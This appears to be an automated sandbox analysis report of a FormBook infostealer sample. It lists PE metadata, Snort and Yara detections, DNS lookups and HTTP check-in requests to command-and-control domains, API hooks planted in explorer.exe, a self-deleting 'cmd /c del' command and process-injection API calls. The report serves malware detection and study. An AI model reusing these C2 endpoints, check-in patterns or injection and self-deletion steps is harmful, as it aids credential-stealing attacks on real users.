                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x837e80x4f.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x840000x5d4.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000x818400x81a00False0.692274514826data6.73403579099IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rsrc0x840000x5d40x600False0.43359375data4.18320178133IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x860000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountry
                      RT_VERSION0x840900x344data
                      RT_MANIFEST0x843e40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                      Imports

                      DLLImport
                      mscoree.dll_CorExeMain

                      Version Infos

                      DescriptionData
                      Translation0x0000 0x04b0
                      LegalCopyrightDelchamps 2015
                      Assembly Version7.3.0.0
                      InternalNameComMemberTy.exe
                      FileVersion7.3.0.0
                      CompanyNameDelchamps
                      LegalTrademarks
                      Comments
                      ProductNamePlatformer_AI
                      ProductVersion7.3.0.0
                      FileDescriptionPlatformer_AI
                      OriginalFilenameComMemberTy.exe

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      10/27/21-19:37:46.597276TCP2031453ET TROJAN FormBook CnC Checkin (GET)4980880192.168.2.5184.168.131.241
                      10/27/21-19:37:46.597276TCP2031449ET TROJAN FormBook CnC Checkin (GET)4980880192.168.2.5184.168.131.241
                      10/27/21-19:37:46.597276TCP2031412ET TROJAN FormBook CnC Checkin (GET)4980880192.168.2.5184.168.131.241

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 27, 2021 19:37:27.982541084 CEST4979980192.168.2.5198.46.90.29
                      Oct 27, 2021 19:37:28.088212013 CEST8049799198.46.90.29192.168.2.5
                      Oct 27, 2021 19:37:28.090246916 CEST4979980192.168.2.5198.46.90.29
                      Oct 27, 2021 19:37:28.090456009 CEST4979980192.168.2.5198.46.90.29
                      Oct 27, 2021 19:37:28.195401907 CEST8049799198.46.90.29192.168.2.5
                      Oct 27, 2021 19:37:28.198955059 CEST8049799198.46.90.29192.168.2.5
                      Oct 27, 2021 19:37:28.199266911 CEST4979980192.168.2.5198.46.90.29
                      Oct 27, 2021 19:37:28.199538946 CEST4979980192.168.2.5198.46.90.29
                      Oct 27, 2021 19:37:28.306003094 CEST8049799198.46.90.29192.168.2.5
                      Oct 27, 2021 19:37:46.433934927 CEST4980880192.168.2.5184.168.131.241
                      Oct 27, 2021 19:37:46.597023964 CEST8049808184.168.131.241192.168.2.5
                      Oct 27, 2021 19:37:46.597141027 CEST4980880192.168.2.5184.168.131.241
                      Oct 27, 2021 19:37:46.597275972 CEST4980880192.168.2.5184.168.131.241
                      Oct 27, 2021 19:37:46.760374069 CEST8049808184.168.131.241192.168.2.5
                      Oct 27, 2021 19:37:46.781284094 CEST8049808184.168.131.241192.168.2.5
                      Oct 27, 2021 19:37:46.781377077 CEST8049808184.168.131.241192.168.2.5
                      Oct 27, 2021 19:37:46.781502008 CEST4980880192.168.2.5184.168.131.241
                      Oct 27, 2021 19:37:46.781589031 CEST4980880192.168.2.5184.168.131.241
                      Oct 27, 2021 19:37:46.944431067 CEST8049808184.168.131.241192.168.2.5

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 27, 2021 19:37:27.807337046 CEST6529653192.168.2.58.8.8.8
                      Oct 27, 2021 19:37:27.974387884 CEST53652968.8.8.8192.168.2.5
                      Oct 27, 2021 19:37:46.396549940 CEST4999253192.168.2.58.8.8.8
                      Oct 27, 2021 19:37:46.432111979 CEST53499928.8.8.8192.168.2.5
                      Oct 27, 2021 19:38:07.052898884 CEST5712853192.168.2.58.8.8.8
                      Oct 27, 2021 19:38:07.451025963 CEST53571288.8.8.8192.168.2.5

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      Oct 27, 2021 19:37:27.807337046 CEST192.168.2.58.8.8.80x95b3Standard query (0)www.carterscts.comA (IP address)IN (0x0001)
                      Oct 27, 2021 19:37:46.396549940 CEST192.168.2.58.8.8.80x312dStandard query (0)www.mr-exclusive.comA (IP address)IN (0x0001)
                      Oct 27, 2021 19:38:07.052898884 CEST192.168.2.58.8.8.80xbee1Standard query (0)www.lenovoidc.comA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      Oct 27, 2021 19:37:27.974387884 CEST8.8.8.8192.168.2.50x95b3No error (0)www.carterscts.comcarterscts.comCNAME (Canonical name)IN (0x0001)
                      Oct 27, 2021 19:37:27.974387884 CEST8.8.8.8192.168.2.50x95b3No error (0)carterscts.com198.46.90.29A (IP address)IN (0x0001)
                      Oct 27, 2021 19:37:46.432111979 CEST8.8.8.8192.168.2.50x312dNo error (0)www.mr-exclusive.commr-exclusive.comCNAME (Canonical name)IN (0x0001)
                      Oct 27, 2021 19:37:46.432111979 CEST8.8.8.8192.168.2.50x312dNo error (0)mr-exclusive.com184.168.131.241A (IP address)IN (0x0001)
                      Oct 27, 2021 19:38:07.451025963 CEST8.8.8.8192.168.2.50xbee1Name error (3)www.lenovoidc.comnonenoneA (IP address)IN (0x0001)

                      HTTP Request Dependency Graph

                      • www.carterscts.com
                      • www.mr-exclusive.com

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.549799198.46.90.2980C:\Windows\explorer.exe
                      TimestampkBytes transferredDirectionData
                      Oct 27, 2021 19:37:28.090456009 CEST3714OUTGET /s18y/?eXwdIN10=4Ci6vsYQWs8id7GhdYTjZRJculBFGSFOZGvHXdH6NGfnjVfmX1rRX92W0hUQgL+8jwmH&3fU4r=D2MpiZv HTTP/1.1
                      Host: www.carterscts.com
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
                      Oct 27, 2021 19:37:28.198955059 CEST3714INHTTP/1.1 404 Not Found
                      Server: nginx/1.21.3
                      Date: Wed, 27 Oct 2021 17:37:28 GMT
                      Content-Type: text/html; charset=iso-8859-1
                      Content-Length: 236
                      Connection: close
                      Vary: Accept-Encoding
                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 61 79 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 20 6f 72 20 72 65 2d 6e 61 6d 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 77 65 62 20 73 69 74 65 20 6f 77 6e 65 72 20 66 6f 72 20 66 75 72 74 68 65 72 20 61 73 73 69 73 74 61 6e 63 65 2e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>Error 404 - Not Found</title><head><body><h1>Error 404 - Not Found</h1><p>The document you are looking for may have been removed or re-named. Please contact the web site owner for further assistance.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.549808184.168.131.24180C:\Windows\explorer.exe
                      TimestampkBytes transferredDirectionData
                      Oct 27, 2021 19:37:46.597275972 CEST3980OUTGET /s18y/?eXwdIN10=Pa4nojFHNdgR9BnFd7o8aKQocYkXN/E4z79GVA9AtWALsHU61u0W5ib2TTz7NOJsFj7K&3fU4r=D2MpiZv HTTP/1.1
                      Host: www.mr-exclusive.com
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
                      Oct 27, 2021 19:37:46.781284094 CEST3981INHTTP/1.1 302 Found
                      Server: nginx/1.20.1
                      Date: Wed, 27 Oct 2021 17:37:46 GMT
                      Content-Type: text/html; charset=utf-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Location: https://www.afternic.com/forsale/mr-exclusive.com?utm_source=TDFS&utm_medium=sn_affiliate_click&utm_campaign=TDFS_GoDaddy_DLS&traffic_type=TDFS&traffic_id=GoDaddy_DLS
                      Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Code Manipulations

                      User Modules

                      Hook Summary

                      Function NameHook TypeActive in Processes
                      PeekMessageAINLINEexplorer.exe
                      PeekMessageWINLINEexplorer.exe
                      GetMessageWINLINEexplorer.exe
                      GetMessageAINLINEexplorer.exe

                      Processes

                      Process: explorer.exe, Module: user32.dll
                      Function NameHook TypeNew Data
                      PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE7
                      PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE7
                      GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xE7
                      GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xE7

                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      Behavior

                      Click to jump to process

                      System Behavior

                      General

                      Start time:19:36:12
                      Start date:27/10/2021
                      Path:C:\Users\user\Desktop\NvkGETsSDb.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\Desktop\NvkGETsSDb.exe'
                      Imagebase:0x180000
                      File size:533504 bytes
                      MD5 hash:E17B528F9C192653DC9777BD46E48D82
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.257370628.00000000038A9000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.257370628.00000000038A9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.257370628.00000000038A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:low

                      General

                      Start time:19:36:14
                      Start date:27/10/2021
                      Path:C:\Users\user\Desktop\NvkGETsSDb.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\NvkGETsSDb.exe
                      Imagebase:0x9e0000
                      File size:533504 bytes
                      MD5 hash:E17B528F9C192653DC9777BD46E48D82
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.253147010.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.253147010.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.253147010.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.315756855.0000000000FD0000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.315756855.0000000000FD0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.315756855.0000000000FD0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.253638394.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.253638394.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.253638394.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.315792746.0000000001000000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.315792746.0000000001000000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.315792746.0000000001000000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:low

                      General

                      Start time:19:36:17
                      Start date:27/10/2021
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff693d90000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.303659400.000000000F70F000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.303659400.000000000F70F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.303659400.000000000F70F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.288307054.000000000F70F000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.288307054.000000000F70F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.288307054.000000000F70F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:high

                      General

                      Start time:19:36:42
                      Start date:27/10/2021
                      Path:C:\Windows\SysWOW64\ipconfig.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\ipconfig.exe
                      Imagebase:0x200000
                      File size:29184 bytes
                      MD5 hash:B0C7423D02A007461C850CD0DFE09318
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.515839448.0000000002700000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.515839448.0000000002700000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.515839448.0000000002700000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:moderate

                      General

                      Start time:19:36:46
                      Start date:27/10/2021
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:/c del 'C:\Users\user\Desktop\NvkGETsSDb.exe'
                      Imagebase:0x150000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:19:36:48
                      Start date:27/10/2021
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7ecfc0000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Disassembly

                      Code Analysis

                      Reset < >

                        Executed Functions

                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID: $-
                        • API String ID: 0-1933255201
                        • Opcode ID: daf80f8ee5d70b92b4e157682e06191379fdc87a383b2dd48612ef4cbde42fbb
                        • Instruction ID: 91f5c5ba60077c2f441c049d796eaaeabbd4aa081ffe5664c3a0d7f874c86f59
                        • Opcode Fuzzy Hash: daf80f8ee5d70b92b4e157682e06191379fdc87a383b2dd48612ef4cbde42fbb
                        • Instruction Fuzzy Hash: CFC115B4E0422A8FDB64CF65C8947DDBBF1BB49300F1085EAD549A7250EB74AAC5DF40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ea0c4b80e656409818b7ff8a517c9b46ff60c09b97243c58b25c0a1e2c94a4ac
                        • Instruction ID: d0f9191483862d1e9cfc95338db943e02e911433a5278a7f4eacc5801f9d13a3
                        • Opcode Fuzzy Hash: ea0c4b80e656409818b7ff8a517c9b46ff60c09b97243c58b25c0a1e2c94a4ac
                        • Instruction Fuzzy Hash: 79A1F2B4E0524A8FCB04DFE9C5886DEBBF2BF89304F24C46AD419AB245E734E941CB51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04DC8A96
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: f9a4b1eaf6da64495048fe1debc5c008c020a7dd8ec2d34dfc0495b47cbad54f
                        • Instruction ID: fd9b4629988c498552c72a17badab5ffa17de5a87938a891c7d4516166c5e7f2
                        • Opcode Fuzzy Hash: f9a4b1eaf6da64495048fe1debc5c008c020a7dd8ec2d34dfc0495b47cbad54f
                        • Instruction Fuzzy Hash: 83A18271D0061ADFDF10DFA8C841BEDBBB2BF49305F1485A9E809A7240DB74A985DF92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04DC8A96
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: fc7df527b670f86d73721cbd58986ebf05be997ca5ecc8c3a12fd5bffd112b3b
                        • Instruction ID: f29f59e7dbf41902f6fbbd8735c298d03e8b672c549586186b6bf09a5826e3f5
                        • Opcode Fuzzy Hash: fc7df527b670f86d73721cbd58986ebf05be997ca5ecc8c3a12fd5bffd112b3b
                        • Instruction Fuzzy Hash: DD919271D0061ADFDF10DFA8C841BEEBBB2BF49305F048569E809A7240DB74A985DF92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04DC8668
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 15c1eabf26b38878e1b81f9e2c18128571ab1ae6ad1539a7d4f498acc6560729
                        • Instruction ID: 97d9d987059bc1f6c9bb33a20d67e3f72ad02ddc0a6c53991871f485b516f6a8
                        • Opcode Fuzzy Hash: 15c1eabf26b38878e1b81f9e2c18128571ab1ae6ad1539a7d4f498acc6560729
                        • Instruction Fuzzy Hash: 662144719003499FCB10DFA9C880BDEBBF5FF48314F00882AE919A7240D778A955CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04DC8668
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 04eaa583031bbce66baa9e96500db0b345e3fc65fe1a8e372b75c4f9a233384f
                        • Instruction ID: 556615bf690e80f3a379cc180433bcef1b1f7ffa2799a291725f70ab8b640c35
                        • Opcode Fuzzy Hash: 04eaa583031bbce66baa9e96500db0b345e3fc65fe1a8e372b75c4f9a233384f
                        • Instruction Fuzzy Hash: BF215571900249DFCF10CFA9C880BEEBBF5FF48314F00882AE919A7240C778A955CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GetThreadContext.KERNELBASE(?,00000000), ref: 04DC84BE
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: ContextThread
                        • String ID:
                        • API String ID: 1591575202-0
                        • Opcode ID: 437e237b708f27e53e1237f2ae113de671f739df2949b36d2e767406bf4fc5bc
                        • Instruction ID: e1c279c2a73381434c0086a7b15221545032d72dac43481a3282d05f06533f1e
                        • Opcode Fuzzy Hash: 437e237b708f27e53e1237f2ae113de671f739df2949b36d2e767406bf4fc5bc
                        • Instruction Fuzzy Hash: C0213A71D006098FDB10DFA9C484BEEBBF5AF48324F14892ED529A7340DB789945CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GetThreadContext.KERNELBASE(?,00000000), ref: 04DC84BE
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: ContextThread
                        • String ID:
                        • API String ID: 1591575202-0
                        • Opcode ID: 81d9c06780590b92842246def7e6fd97772ad7869889ca2d6e247cfffe51ffa5
                        • Instruction ID: c56b830f7ce49d2e1d67255c09cbef1bf188cff12303d65efd4fbde1ab14e08a
                        • Opcode Fuzzy Hash: 81d9c06780590b92842246def7e6fd97772ad7869889ca2d6e247cfffe51ffa5
                        • Instruction Fuzzy Hash: 852139719006098FDB10DFA9C4847EEBBF5AF48214F148829D419A7240C778A945CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04DC8748
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: 6c44d39dce587ae948ffde6868f8a7564f00e59ccbff0a7c45e2448f396ee4b4
                        • Instruction ID: 661e538e9bb9d5d3fce51681685d991e5e6dfe3d7c0d6bcfa16b57412b006d77
                        • Opcode Fuzzy Hash: 6c44d39dce587ae948ffde6868f8a7564f00e59ccbff0a7c45e2448f396ee4b4
                        • Instruction Fuzzy Hash: D42128718006499FDF10DFAAC880BDEFBF5FF48314F508829E519A7240D7749955CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04DC8586
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 728e6cdb20b387c8d8b185faf9955576b1cf9e03970a965cae77f2c963ce09e2
                        • Instruction ID: 55a956c5ea9c56057a40573c261a5923fd460de2a2836a4957637b029ed44790
                        • Opcode Fuzzy Hash: 728e6cdb20b387c8d8b185faf9955576b1cf9e03970a965cae77f2c963ce09e2
                        • Instruction Fuzzy Hash: 721167718002099FDF10DFA9C844BDFBBF9EF88324F148819E515A7200C775A955CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ResumeThread.KERNELBASE(?), ref: 04DC83F2
                        Memory Dump Source
                        • Source File: 00000000.00000002.259863231.0000000004DC0000.00000040.00000001.sdmp, Offset: 04DC0000, based on PE: false
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: 2825180ecdcae1f232a3b56510e9d1436d5006929d18cf5083799f1d21e699f2
